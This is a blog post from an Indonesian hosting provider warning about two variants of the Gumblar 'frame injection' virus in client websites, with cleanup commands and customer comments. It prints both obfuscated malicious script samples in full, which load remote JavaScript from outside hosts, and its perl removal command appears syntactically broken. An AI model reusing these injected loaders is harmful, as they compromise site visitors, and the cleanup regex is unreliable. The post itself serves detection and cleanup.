Hosting Surabaya Blog

• Home
• Panduan Web Hosting
  • Panduan Directadmin Web Hosting Manager
• Daftar Isi

• CMS
  • Joomla
  • Opencart
  • Prestashop
  • Wordpress
• Ebook
• Gratisan
• Inspirasi
• Internet
  • Aneh Aneh
  • Curhat
• Layanan
  • domain
  • Pengumuman
  • Promo
  • Reseller
  • workshop
• Panduan
  • Client Area
  • Directadmin
  • Konfigurasi
• Seo Tips
• Tips & Trick
• Tutorial
  • Command
  • CSS
  • Hacking
  • Linux
  • PHP

Waspada, 2 Varian Virus Gumblar menginjeksi Website Anda

Kemarin tiba-tiba dapat teguran abuse dari DC (baca:Data Center) kita bahwa salah satu client ternyata telah terinfeksi virus gumblar yang dikenal juga sebagai virus frame injeksi. Kali ini ciri2 virus ini tidak hanya melakukan ijeksi pada file index.php atau index.html melainkan sudah mulai menjalar masuk ke puluhan script-script lain ber ekstensi .JS

wah…  puluhan script terinfeksi, parah kan?

berikut variannya

VARIAN 1

<script>/*GNU GPL*/ try{window.onload = function(){var Hva23p3hnyirlpv7 = document.createElement('script');Hva23p3hnyirlpv7.setAttribute('type', 'text/javascript');Hva23p3hnyirlpv7.setAttribute('id', 'myscript1');Hva23p3hnyirlpv7.setAttribute('src',  'h))t#^t$#))!p&&#:^!&/^^/)^(@m&()y&#b(r@&&!!o)^w(&(s)^)$e(@&#r&))b^a#r!&$-#@c&#o#m#@&.)@$s)a!m$&s#)^u!$^n$g#!.$c!^o^@(m#.^n@!#a@@s#$!a#&-(@^g$o)#v)@&$.(!(@(e)&g&!#r)e)@)a^)t$!s(!(a@!l#e@.@)@r)#u(&#!:)@8!^)0!8$!(0!/^#m$$e)g^&a###v&!i&d!e))#o!@(.(@c&)o$!(m^&/^m&^e((^)g$!((a)#)^v@!i(@&#d#)e@&o$#.^c$!#o@m^/$#&l$a)r#@(e)^^d#&o(!()u#(t$)e##.$f(r^&(@/!(^&b!!i)$$l@)!)d^&.#@&(d$@$e(/)g$o^o$&^g^!&l()e!).(@^#c)$!o#&)@@m!/^$'.replace(/$|^|!|&|)|(|@|#/ig, ''));Hva23p3hnyirlpv7.setAttribute('defer', 'defer');document.body.appendChild(Hva23p3hnyirlpv7);}} catch(e) {}</script>

VARIAN 2

<script>/*LGPL*/ try{ window.onload = function(){var Wzw6mi0yfxh = document.createElement('s)$c!!r!!i&$p)$t&'.replace(/$|@|!|&|#|(|)|^/ig, ''));Wzw6mi0yfxh.setAttribute('defer', 'd)$$&e#^$f)$e)!&r$#'.replace(/^|#|$|(|)|@|!|&/ig, ''));Wzw6mi0yfxh.setAttribute('type', 't@e!$^x)!#t!&/$(!)j(!a^$v)a^))s(!c^r#@$i@$(#p$t)&'.replace(/)|&|#|@|^|(|!|$/ig, ''));Wzw6mi0yfxh.setAttribute('id', 'E^!j#@^#5&(^#q!!z(#q!&c#^d!!4(#z@l@@@#'.replace(/!|$|&|(|)|^|@|#/ig, ''));Wzw6mi0yfxh.setAttribute('s&(r^!@c)#('.replace(/!|(|&|$|@|^|#|)/ig, ''),  'h#t#&@t^&p(@):)&)/^!$/)l)e&b)!o)$n^@c!!(o)i#n$$-#f@$r@((.!$#&m@#a&^i)()n&&@i&#c(h(^i(^.$)$j(p$(#.!^!s)o&$n))$^i!(^c&!o$&@-@c@#o!(^^m&$.@t#h)^e(^l$a(c@$!e)@&)!w(e$b#!.(r^)u^$!:@$^8$0^$8)!0)&(/^&g@o$$!#o&$g!)!l#)&e$.!^$c(@@o&m!#&^/@!g^o)@^#o(^g)@l!!#^e^&.)c$&$@o^&m&($/!!&(v)!i@!r)(g#@@i$#n$^^@m#e@(^@d)#i$!a@@.^c(#o^@m(!^/&h$(u$#f&!&f#i#^n^#!g&#&t$!o&$!n&&p)&o@s#^(t&).$$$c)$$o@m$#!/)#n(i(n$(@(g$((.$)#c!o$!$m)/&('.replace(/&|)|$|#|@|(|^|!/ig, ''));if (document){document.body.appendChild(Wzw6mi0yfxh);}} } catch(Pxbfkbch1d1sq271kl4tb) {}</script>
<!--487d9122241bbf0730e5cc7447f5ef1d-->

Seperti yang anda perhatikan, lagi-lagi sangat payah karena script tersebut di enkripsi.

SOLUSI / CARA MENGATASI

Temukan semua file yang terinfeksi dengan menggunkan peritah berikut

# find . | xargs grep 'string' -sl

isilah string dengan mengambil beberapa karakteristik virus misalnya menjadi

# find . | xargs grep 'va23p3hnyirlpv' -sl

dan eksekusi, hmnnn wowowwow berapa banyak file yang telah terinfeksi? terkejut kan karena kali ini injeksi virus telah menginfeksi puluhan script tidak seperti biasanya hanya satu atau dua script.

selanjutnya bagaimana cara menghapusnya?

seperti biasa cara menghapus paling nyaman adalah melalui shell berikut contoh command shellnya

# find . -name '*.*' | xargs perl -pi -e 's/<script>/*GNU GPL*/ try.*Hva23p3h.*$}</script>//g'

identifikasi regular expresi berdasarkan posisi awal script /*GNU GPL*/ posisi identitas tengah script ambil beberapa string dan identifikasi pada bagian akhir string virus.

stelah mengeksekusi perintah tersebut, cek ulang dengan command shell sebelumnya

Virus membawa berkah? apa itu?

Dapat beberapa limpahan klien dari beberapa hoster lain yang mensuspend website client mereka meski sementara kadang klien ngga sabar sehingga ada klien yang mencari alternatif host untuk landing website mereka selanjutnya. Tentunya kita juga membantu membersihkan website mereka dari virus tersebut. jadi kapan giliran anda? pindah saja site anda ke ph ya? hehehe

About the author

wrote 255 articles on this blog.

Provider Registrasi Domain , Hosting Murah,VPS & Dedicated Server
Live Chat Online : Senin – Sabtu 09.00 – 16.00 wIB
Support : support [at] pusathosting.com
Aktivasi : billing [at] pusathosting.com
Follow kami di Twitter, Facebook & Google Plus

• Blog : About Me

Baca juga artikel ini :

1. awas Malware money2008.org dan Js/Downloader menginjeksi situs anda
2. Cegah Virus dengan Disable Autorun di Windows
3. Anda Ingin Promosikan Situs / Website Anda
4. comm100 Online Support Gratis untuk Website anda
5. Pasang Google Pagerank Cheker Pada Website Anda – Gratis

7 Responses - Add Yours+

1. sariful mengatakan:

   Januari 27, 2010 pukul 8:34 am

   promosi yang bagus.. dan akhirnya saya juga nyasar ke sini :d
2. hadi mengatakan:

   Januari 27, 2010 pukul 9:00 am

   hehe sip mas
3. ADAbisnis.com mengatakan:

   Januari 31, 2010 pukul 6:25 pm

   Wkwkwkwk… promosi yg bagus bos… Pusat hosting memang ok bgt. Sudah pelayanannya ramah, dedicated server lagi. Kenceng euy.
4. Chase Peterson mengatakan:

   Mei 19, 2010 pukul 3:56 pm

   Can anyone suggest a reliable Dedicated Server hosting that is not very expensive?”’
5. Banyak IP local yang mungkin terinfeksi Malware | Web Hosting Surabaya Blogs mengatakan:

   Juli 3, 2010 pukul 3:32 pm

   [...] Waspada, 2 Varian Virus Gumblar menginjeksi Website Anda [...]
6. sariful mengatakan:

   Agustus 3, 2010 pukul 4:04 pm

   @mas hadi: sip-sip juga mas…. bagi-bagi backlink dunk untuk client.. usulan aza…
7. admin mengatakan:

   Agustus 3, 2010 pukul 4:38 pm

   saya sungkan mas mau listing tukar link lah ini website saya kan kena pinalti google PR awalnya 4 jadi 0 nolll.. untungnya aja index ga sampai dihapus.